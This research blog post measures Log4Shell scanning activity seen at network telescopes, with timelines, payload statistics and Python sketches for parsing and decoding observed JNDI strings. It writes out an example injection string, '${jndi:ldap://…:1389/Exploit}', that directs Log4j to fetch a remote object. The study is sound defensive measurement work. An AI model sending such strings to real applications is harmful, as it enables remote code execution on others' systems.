The omnipresence of software introduces a constant threat of new vulnerabilities that affect widely deployed implementations. At the end of 2021, the Log4Shell vulnerability (CVE-2021-44228) made headlines. It enables remote code execution in vulnerable applications by injecting a crafted string into the widely used Log4j library. Apache publicly disclosed Log4Shell on 10 December 2021, alongside a fix in Log4j version 2.15.0.
How it works
Log4j supports the runtime evaluation of specially formatted messages. These messages can not only add information, such as the Java version, but also trigger queries through JNDI, the Java Naming and Directory Interface. Attackers can deploy one of the services supported by JNDI and trick the victim application into downloading specially prepared Java objects from it. These objects then run small snippets of code to download and run malware, thus enabling remote code execution, provided an attacker can get the victim application to log the prepared message with Log4j.
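To make the idea of runtime evaluation more concrete, here is a toy sketch in Python. It is not Log4j's implementation: the LOOKUPS table, the resolve function, and all returned values are hypothetical stand-ins, and the 'jndi' handler only reports what would be queried instead of contacting any service.

```python
import re

# Hypothetical lookup table for illustration only; not Log4j's real registry.
LOOKUPS = {
    # Harmless lookups add information to the log message.
    "java": lambda key: "Java 17 (placeholder)" if key == "version" else "",
    # A real JNDI lookup would contact the remote service named in the
    # request. This stand-in only reports what would be queried.
    "jndi": lambda key: f"<would query {key}>",
}

# Matches the plain form ${scheme:request}.
PATTERN = re.compile(r"\$\{([a-z]+):([^}]*)\}")


def resolve(message: str) -> str:
    """Replace every ${scheme:request} in the message with a lookup result."""
    def substitute(match: re.Match) -> str:
        scheme, request = match.group(1), match.group(2)
        handler = LOOKUPS.get(scheme)
        # Unknown schemes are left untouched in this sketch.
        return handler(request) if handler else match.group(0)

    return PATTERN.sub(substitute, message)


print(resolve("Running on ${java:version}"))
print(resolve("User-Agent: ${jndi:ldap://192.0.2.1:1389/Exploit}"))
```

The second call shows why logging attacker-controlled input is dangerous: the logged text itself decides which service is queried.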
Scanners
We observed TCP scan attempts in December 2021 and January 2022. Our vantage points (VPs) are four /24 IPv4 prefixes, one in the US and three in the EU. Each deploys Spoki, a reactive telescope that establishes TCP connections and collects payloads.
We classify events, that is, packets with a Log4j format string, into malicious, benign, and unknown categories, based on their source IP using GreyNoise. Figure 1 gives an overview of the scan activity observed at the US VP and EU VP 1. The upper graphs show a time series for each category while the heat maps below visualize malicious intensity, calculated from the share of malicious events among all events per hour.
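The malicious intensity described above is a simple per-hour ratio. A minimal sketch, assuming events are already labelled with a category (the function name, the event tuples, and the sample data are hypothetical, not taken from our measurement pipeline):

```python
from collections import Counter, defaultdict
from datetime import datetime, timezone


def malicious_intensity(events):
    """Return {hour: share of malicious events among all events in that hour}.

    `events` is an iterable of (timestamp, category) pairs, where category
    is one of "malicious", "benign", or "unknown".
    """
    per_hour = defaultdict(Counter)
    for timestamp, category in events:
        # Truncate the timestamp to the start of its hour.
        hour = timestamp.replace(minute=0, second=0, microsecond=0)
        per_hour[hour][category] += 1
    return {
        hour: counts["malicious"] / sum(counts.values())
        for hour, counts in sorted(per_hour.items())
    }


# Hypothetical sample data for illustration.
sample = [
    (datetime(2021, 12, 9, 23, 5, tzinfo=timezone.utc), "malicious"),
    (datetime(2021, 12, 9, 23, 40, tzinfo=timezone.utc), "unknown"),
    (datetime(2021, 12, 10, 0, 15, tzinfo=timezone.utc), "benign"),
]
for hour, intensity in malicious_intensity(sample).items():
    print(hour.isoformat(), intensity)
```

Hours without any events do not appear in the result, so a heat map built from it would need to treat them as missing rather than as zero.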
The first scans started on the evening of 9 December (23:00 UTC) at the US vantage point. The EU vantage points observed the first packets 16 hours later (15:00 UTC, 10 December). Notably, benign events were registered only in the first week after the disclosure. After a period of high activity in December, the events per day dropped to around 100 in the EU and 2,000 or fewer in the US.
Two peaks in the US, one from a malicious source and one from an unknown source, stand out. They are caused by two IP addresses from the same Autonomous System (AS) in Russia. Both scanners methodically try different payloads and together produce about 60% of the packets observed in the US.
The heat maps reveal a period of mixed activity before malicious sources take over. While the benign actors start scanning before traffic peaks, they quickly lose interest. Here, researchers and threat intelligence providers have room to perform continuous measurements and observe the changing landscape.
Common tooling among attackers
The key to the exploit is tricking the victim application into logging the prepared string with Log4j. These strings have the form ${scheme:request}. For the Log4Shell exploit the scheme is set to ‘jndi’ while the request is a URL: scheme://host:port/path. Among the URLs we collected, several characteristics are frequently used by attackers.
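A minimal sketch of how such a string can be split into its parts, assuming the plain form described above. The function name parse_lookup and the sample payload are hypothetical, and the address comes from a documentation range.

```python
import re
from urllib.parse import urlsplit

# Matches the plain form ${scheme:request}.
LOOKUP = re.compile(r"\$\{(?P<scheme>[A-Za-z]+):(?P<request>[^}]*)\}")


def parse_lookup(payload: str):
    """Extract service, host, port, and path from a ${jndi:...} string.

    Returns None if the payload contains no lookup or the lookup is not JNDI.
    """
    match = LOOKUP.search(payload)
    if match is None or match.group("scheme").lower() != "jndi":
        return None
    url = urlsplit(match.group("request"))
    try:
        port = url.port
    except ValueError:
        # urlsplit raises ValueError for non-numeric or out-of-range ports.
        port = None
    return {
        "service": url.scheme,
        "host": url.hostname,
        "port": port,
        "path": url.path,
    }


print(parse_lookup("GET /?q=${jndi:ldap://192.0.2.10:1389/Exploit} HTTP/1.1"))
# {'service': 'ldap', 'host': '192.0.2.10', 'port': 1389, 'path': '/Exploit'}
```

This sketch handles only the plain ${scheme:request} form and returns the first lookup it finds in a payload.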
First, most attacks work via the LDAP service. Figure 2 shows the event count for each scheme we observed, on a logarithmic y-axis. The EU vantage points see LDAP almost exclusively. While attacks over RMI received attention in the media, we observed only a handful of RMI requests at both vantage points. Three of them (US) match the URL mentioned in the media coverage. These attacks may have been targeted and therefore did not hit our VPs in bulk. The DNS and HTTP events originate from the benign actors shown in Figure 1.
Second, the most popular port for LDAP servers is the non-default port 1389. It is used in 93% to 96% of all LDAP events. Other ports each make up only 1% to 2%.
Finally, the URL paths show large overlaps. Except for a single path, observed paths do not conform to the LDAP URL specification (RFC 4516) as they do not include a valid distinguished name.
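Port shares of this kind can be derived with a simple tally. A minimal sketch, assuming each event has already been reduced to a (service, port) pair; the function name port_shares and the sample events are hypothetical and do not reproduce our measured numbers.

```python
from collections import Counter


def port_shares(events, service="ldap"):
    """Return {port: share} for all events that use the given service."""
    counts = Counter(port for svc, port in events if svc == service)
    total = sum(counts.values())
    if total == 0:
        return {}
    # most_common() orders the ports from most to least frequent.
    return {port: count / total for port, count in counts.most_common()}


# Hypothetical sample: three LDAP events on port 1389, one on the default 389.
sample = [("ldap", 1389), ("ldap", 1389), ("ldap", 1389), ("ldap", 389), ("rmi", 1099)]
print(port_shares(sample))
# {1389: 0.75, 389: 0.25}
```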
Two paths stand out: /Exploit, which makes up the largest share at all vantage points with 70% to 80% in the EU and 20% in the US, and paths that share the segments Command/Base64 followed by a base64-encoded segment. This group takes the second-largest share. These paths begin in a variety of ways, potentially hinting at their purposes, such as TomcatBypass or GroovyBypass. Decoding the base64 segment reveals script code that downloads an executable via HTTP to run locally.
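Decoding such a path takes only a few lines. A minimal sketch, assuming the layout /<prefix>/Command/Base64/<segment> and assuming the segment may be percent-encoded or lack padding; the function name decode_command and the harmless sample command are hypothetical.

```python
import base64
from urllib.parse import unquote

MARKER = "/Command/Base64/"


def decode_command(path: str):
    """Return (prefix, decoded command) for a Command/Base64 path, else None."""
    prefix, found, encoded = path.partition(MARKER)
    if not found:
        return None
    # Assumption: the segment may be percent-encoded inside the URL.
    encoded = unquote(encoded)
    # Restore padding that may have been stripped.
    encoded += "=" * (-len(encoded) % 4)
    try:
        command = base64.b64decode(encoded).decode("utf-8", errors="replace")
    except ValueError:
        # binascii.Error, raised for invalid base64, is a ValueError subclass.
        return None
    return prefix.strip("/"), command


# Harmless example: the segment encodes the string "echo hello".
print(decode_command("/TomcatBypass/Command/Base64/ZWNobyBoZWxsbw=="))
# ('TomcatBypass', 'echo hello')
```

The decoded text should only ever be inspected, never executed.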
Open source projects on GitHub connect the dots between LDAP, port 1389, and the base64 segments. An LDAP server, aptly named JNDIExploit, uses this port as its default and supports a range of similarly composed URLs. For a given URL, it decodes the base64-encoded segment and dynamically builds a Java object that runs the code when loaded by JNDI. This allows attackers to reuse a simple LDAP server for different attacks by adjusting the payload they send during scanning. Although the original project is no longer available, forks exist. The projects are older than the recent Log4Shell vulnerability, just like the exploit for JNDI, which was presented at Black Hat in 2016.
Takeaways
Log4Shell is a critical vulnerability that affects a wide range of applications with different attack vectors. Our observation of scanning reveals a quick increase in malicious events and continued interest, although at a reduced volume. Benign scanners quickly started looking for vulnerable hosts, but ceased scanning after a few days. We cannot measure the success rate of attackers, but observing scanning behaviour can be a useful indicator of how active attackers are. A quick decrease in scanning activity may be a sign that vulnerable services are thinning out.
Common characteristics among payloads hint at common tools, such as the open source JNDIExploit project. The availability of tooling makes it easier to set up and run an attack. This could be a reason for the rapid rise in attack volume.
On a positive note, the vulnerability saw wide coverage online as blog posts were published, lists of vulnerable applications were collected, and detection tools were quickly made available. At the same time, official organizations published reports and issued warnings.
The underlying problem of Log4Shell is insufficient input sanitization, a common challenge that has plagued the industry for years in the form of SQL injection. User-supplied input must be treated with caution.
For more information, read our paper “The Race to the Vulnerable: Measuring the Log4j Shell Incident”, which was presented at the Network Traffic Measurement and Analysis Conference (TMA) in June 2022.
Raphael Hiesgen is a PhD student at HAW Hamburg. His research focuses on Internet measurements and security, often using network telescopes for this purpose. This work wouldn’t have been possible without his co-authors: Marcin Nawrocki (FU Berlin), Thomas C. Schmidt (HAW Hamburg), and Matthias Wählisch (FU Berlin).